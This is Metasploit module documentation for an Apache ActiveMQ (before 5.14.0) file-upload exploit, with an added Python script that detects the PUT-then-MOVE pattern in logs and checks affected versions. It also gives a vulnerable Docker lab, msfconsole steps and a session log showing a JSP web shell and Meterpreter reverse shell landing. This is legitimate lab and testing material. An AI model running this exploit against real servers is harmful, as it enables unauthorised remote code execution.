Vulnerable Application
This module exploits a vulnerability in Apache ActiveMQ 5.x before 5.14.0 which
allows remote attackers to upload and execute arbitrary files via an HTTP PUT
followed by an HTTP MOVE request. By default, a JSP web shell and Java
Meterpreter payload are uploaded to the /fileserver/ path of a vulnerable
server, then moved via an HTTP MOVE request to either /api/ or /admin/.
You should get a shell as the user running ActiveMQ.
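As an added defensive example (not part of this module's documentation, of Metasploit or of ActiveMQ), the following Python script flags the PUT-then-MOVE pattern described above in NCSA-style request logs and checks a version string against the affected range (5.x before 5.14.0). The log lines are constructed for the example; the success status codes accepted for the PUT, the 60-second pairing window and the log layout are assumptions.

```python
"""Added example: spot the fileserver PUT-then-MOVE pattern in request logs and
check a version string against the affected range (ActiveMQ 5.x before 5.14.0).
Not part of the module or of ActiveMQ; the log lines below are constructed."""
import re
from datetime import datetime, timedelta

# NCSA common log format as written by a Jetty request log (assumed layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample: one PUT/MOVE pair within seconds (suspicious) and one
# pair from another client more than an hour apart (outside the window).
SAMPLE_LOG = [
    '172.17.0.1 - - [14/Mar/2021:18:25:30 -0400] "GET /admin/ HTTP/1.1" 200 5123',
    '172.17.0.1 - - [14/Mar/2021:18:25:31 -0400] "PUT /fileserver/upload1.jsp HTTP/1.1" 204 0',
    '172.17.0.1 - - [14/Mar/2021:18:25:32 -0400] "MOVE /fileserver/upload1.jsp HTTP/1.1" 204 0',
    '10.0.0.7 - - [14/Mar/2021:18:26:00 -0400] "PUT /fileserver/notes.txt HTTP/1.1" 204 0',
    '10.0.0.7 - - [14/Mar/2021:19:30:00 -0400] "MOVE /fileserver/notes.txt HTTP/1.1" 204 0',
    'garbage line that does not parse',
]


def parse_line(line):
    """Return a dict with ip, ts, method, path, status, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "ts": ts,
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_put_move_chains(lines, window=timedelta(seconds=60)):
    """Return (ip, path, move_status) for each MOVE that follows a successful
    PUT of the same /fileserver/ path from the same client within `window`.

    Access logs do not record the MOVE's Destination header, so a MOVE on a
    freshly uploaded fileserver path is the indicator; which directory it
    landed in (/api/ or /admin/ per the description above) is confirmed on
    the host itself."""
    pending = {}  # (ip, path) -> timestamp of the PUT
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["method"] == "PUT" and rec["path"].startswith("/fileserver/")
                and rec["status"] in (200, 201, 204)):  # assumed success codes
            pending[(rec["ip"], rec["path"])] = rec["ts"]
        elif rec["method"] == "MOVE":
            put_ts = pending.pop((rec["ip"], rec["path"]), None)
            if put_ts is not None and rec["ts"] - put_ts <= window:
                hits.append((rec["ip"], rec["path"], rec["status"]))
    return hits


def is_affected_version(version):
    """True for Apache ActiveMQ 5.x releases before 5.14.0, the range given in
    the description above; anything else (6.x, unparseable) returns False."""
    nums = [int(m.group()) for m in
            (re.match(r"\d+", p) for p in version.split(".")[:3]) if m]
    nums += [0] * (3 - len(nums))
    return nums[0] == 5 and tuple(nums) < (5, 14, 0)


if __name__ == "__main__":
    for ip, path, status in find_put_move_chains(SAMPLE_LOG):
        print(f"suspicious fileserver PUT+MOVE from {ip}: {path} (MOVE status {status})")
    for v in ("5.9.0", "5.10.0", "5.14.0", "5.15.9"):
        print(v, "affected" if is_affected_version(v) else "not affected")
```

Run against a real Jetty request log by replacing SAMPLE_LOG with the file's lines; a hit warrants checking the webapps/api and webapps/admin directories for unexpected .jsp or .jar files, and the version check gives the quickest answer on whether an upgrade to 5.14.0 or later is the fix.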
Configuring a Vulnerable Environment
To use a pre-built Docker image:
docker run -it -p 8161:8161 rmohr/activemq:5.10.0
To run an older version of ActiveMQ with Java 8, create a new Dockerfile:
FROM openjdk:8
ENV ACTIVEMQ_VERSION 5.9.0
ENV ACTIVEMQ apache-activemq-$ACTIVEMQ_VERSION
ENV ACTIVEMQ_HOME /opt/activemq
RUN \
curl -O http://archive.apache.org/dist/activemq/apache-activemq/$ACTIVEMQ_VERSION/$ACTIVEMQ-bin.tar.gz && \
mkdir -p /opt && \
tar xf $ACTIVEMQ-bin.tar.gz -C /opt/ && \
rm $ACTIVEMQ-bin.tar.gz && \
ln -s /opt/$ACTIVEMQ $ACTIVEMQ_HOME && \
useradd -r -M -d $ACTIVEMQ_HOME activemq && \
chown activemq:activemq /opt/$ACTIVEMQ -R
USER activemq
WORKDIR $ACTIVEMQ_HOME
EXPOSE 61616 8161
CMD ["/bin/bash", "-c", "bin/activemq console"]
Next build and run the application:
docker build -t activemq:5.9.0 .
docker run -it -p 8161:8161 activemq:5.9.0
Verify the application is running by visiting http://localhost:8161/admin/test/ with the credentials admin:admin.
Verification Steps
- Run the application locally.
- Start msfconsole.
- Do: use multi/http/apache_activemq_upload_jsp
- Do: set rhosts <ip address of remote host>
- Do: set lhost <ip address of local machine>
- Do: run
- You should get a shell under the process running ActiveMQ.
Options
AutoCleanup
Remove web shells from the target system after callback is received (Default: true)
BasicAuthUser
User-supplied username (Default: admin)
BasicAuthPass
User-supplied password associated with username (Default: admin)
JSP
Desired name to assign to the JSP web shell when it is uploaded to the target
system. Do not include the .jsp extension (Default: randomly-generated string)
Advanced Options
UploadPath
Custom path into which web shells will be uploaded on the target system. If the
user determines that a nonstandard directory is able to execute .jsp files, the
user can specify this directory for exploitation (Default: attempt /api/; if that
fails, attempt /admin/)
Scenarios
Targeting ActiveMQ 5.9.0
$ msfconsole -q
msf6 > use multi/http/apache_activemq_upload_jsp
[*] Using configured payload java/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/apache_activemq_upload_jsp) > run
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/qQSWrsmnXtZ.jar
[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/qQSWrsmnXtZ.jsp
[*] Sending stage (58110 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:45634) at 2021-03-14 18:25:38 -0400
[+] Deleted /opt/activemq/webapps/api/qQSWrsmnXtZ.jar
[+] Deleted /opt/activemq/webapps/api/qQSWrsmnXtZ.jsp
meterpreter >